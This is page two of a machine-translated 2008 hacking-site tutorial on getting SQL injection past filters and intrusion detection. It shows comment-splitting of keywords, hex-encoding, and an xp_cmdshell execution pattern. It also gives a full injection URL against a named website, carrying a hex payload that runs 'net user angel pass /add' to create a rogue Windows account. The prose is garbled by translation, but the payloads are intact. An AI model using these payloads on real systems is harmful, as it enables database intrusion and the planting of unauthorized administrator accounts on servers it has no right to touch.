Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > hacker course > Content
Hot Articles
SmoothWall Introduces Lo
Travel of the JSP+Oracle
Hacker skill: Gains Webs
Breaks through the Inter
MYSQL database injection
The Tomcat backstage tak
Breaks through the Inter
The hacker teaches you a
WinHex pursues the code
How does the hacker dest
How teaches you to take
The SQL injection revise
mssql SA jurisdiction ne
Microsoft SQL Server SA
The bored Css cross stat
Recommend Articles
The SQL injection revise
How does the hacker dest
The new military recruit
Union inquires the small
MYSQL database injection
Invades under new skill
How does the website scr
Smells searches works as
How in does the net seep
Microsoft SQL Server SA
A simple invasion, does
The mainstream raises th
The bored Css cross stat
The random combined comm
The hacker teaches you a
New Articles
Check Point offers compa
The malware spreads Cali
Full Disk Encryption pro
Cardholders should take
U.S. still more spam tha
Strong encryption L?solu
ConvexSoft DJ Audio Mixe
Few companies k?can be i
IT professionals can kee
k the media?can not by s
k the media?can not by s
Google Custom Search Eng
Users of the iPhone and
Gateshead College offers
Manchester obtained pass
How does the website script pour into examines bypasses the limit(2)
  Add date: 07/11/2008   Publishing date: 07/11/2008   Hits: 51
Total 2 pages, Current page:2, Jump to page:
 

/Replaces the blank space with/**, for example:

UNION/**/Select/** /user, pwd, from tbluser 


/Divides the sensitive word with/**, for example:

U/**/NION/**/SE/**/LECT/** /user, pwd from tbluser 


11th, bypasses with HEX, IDS generally is unable to examine 

0x730079007300610064006D0069006E00 =hex(sysadmin) 
0x640062005F006F0077006E0065007200 =hex(db_owner) 

Moreover, about the universe point filtration method, we may consider that uses the evaluation the method, for example stated first variable a, then gives ours instruction evaluation a, then transfer variable a carries out the order which finally we input. Variable a may be any order. As follows: 

  declare @a sysname 
  select @a= 
  exec master.dbo.xp_cmdshell @a 

Effect

http://www.ilikeplmm.com/show.asp?id=1;declare%20@a% 20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a; -- 


And 

0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400
Is

“net user angel pass /add”
Meaning.



 
Other pages: : <<Prev * 1 * 2
Prev:Invades under new skill - CMD to add the sql account number Next:Smells searches works as machine little enlightenment

Comment:

Category: Home > hacker course
Home